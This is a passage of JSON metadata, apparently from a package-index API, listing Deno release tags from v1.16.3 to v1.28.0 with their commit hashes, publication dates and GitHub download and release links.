},{"name":"v1.28.0","sha":"916598f8a77d1fb7b7feb577e600ead2bc45045f","kind":"commit","published_at":"2022-11-13T20:31:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.28.0/manifests"},{"name":"v1.27.2","sha":"5cd5cfa8d655e8a71441cf9736df93efde75153c","kind":"commit","published_at":"2022-11-08T21:42:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.2/manifests"},{"name":"v1.27.1","sha":"d448c2950db2ed474405ace6a0a180301eeaa68d","kind":"commit","published_at":"2022-11-03T21:52:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.co